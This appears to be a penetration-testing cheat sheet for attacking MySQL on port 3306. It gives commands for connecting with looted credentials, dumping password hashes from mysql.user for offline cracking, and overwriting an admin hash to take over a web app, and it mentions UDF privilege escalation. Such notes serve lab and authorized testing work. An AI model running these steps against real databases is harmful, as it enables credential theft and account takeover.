MySQL (3306)
enumerationports
Summary
Connect with looted DB creds, dump user tables for hashes, and check app tables for credentials you can reuse or overwrite. Use \G for readable wide rows.
Walkthrough
MySQL (port 3306) is usually reached after you've found DB credentials in a web config.
Steps
- Connect —
mysql -h <IP> -u <user> -p'<pass>'. - Enumerate —
SHOW DATABASES;, then inspect app tables. Use\Ginstead
of ; when rows are too wide to read.
- Dump hashes —
SELECT user, authentication_string FROM mysql.user;and
crack offline; app login tables often store reusable creds.
- Tamper — if you can write, overwrite an admin password hash with one you
know to log into the web app as admin.
> Local MySQL running as root can sometimes be abused for privesc (UDF / > --secure-file-priv); check after you have a shell.
Commands
bash
# Connect with recovered creds mysql -h <IP> -P 3306 -u <USER> -p'<PASS>'
other
# Useful in-client commands # \G -> vertical output instead of ; # SHOW DATABASES; # SELECT user, authentication_string FROM mysql.user; SHOW DATABASES;
other
# Overwrite an app password hash you control UPDATE users SET password='<NEW_HASH>' WHERE user_id='ADM';